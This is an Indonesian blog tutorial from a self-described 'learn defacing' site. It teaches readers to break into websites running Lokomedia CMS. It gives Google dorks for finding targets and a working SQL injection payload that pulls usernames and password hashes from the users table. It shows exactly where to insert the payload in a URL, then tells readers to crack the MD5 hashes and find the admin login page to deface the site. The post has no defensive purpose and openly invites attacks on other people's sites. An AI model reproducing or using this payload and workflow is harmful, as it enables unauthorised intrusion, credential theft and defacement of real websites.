Tutorial Deface : Sql Lokomedia - Defa Squad

Tempat Belajar Deface

Post Top Ad

Monday, May 22, 2017

Tutorial Deface : Sql Lokomedia


Bahan :

1. Dork :

inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html

   Kembangin lagi biar dapet yg VULN + Perawan :p

2. Exploit

    'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Tutorial:
1. Dorking pake dork di atas.

2. Pilih salah satu target. Salah dua juga gapapa :v

3. Masukan injeksi nya.

'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

   Gatau caranya? :v Sini gw ajarin :p

   http://site.co.li/statis-1-profil.html lu tambahin exploit nya sesudah angka. Jadinya gini:
   http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

4. Kalo vuln jadinya bakal kek gini.




5. Tekan Ctrl+U trus copy MD5 nya ke MD5 Decrypter.

Untuk password masih berbentuk hash MD5, bisa kalian hash disini,

6. Tinggal cari admin page nya. Biasanya sih di:

http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktur

kalau gak dapat bisa pake tool admin finder download disini

cukup sampe sini ya tutorial saya , makasih dah baca post saya kali ini
jangan lupa shere ya :)


Tag : Sql lokomedia , belajar deface dengan teknik lokomedia ,

2 comments:

Post Top Ad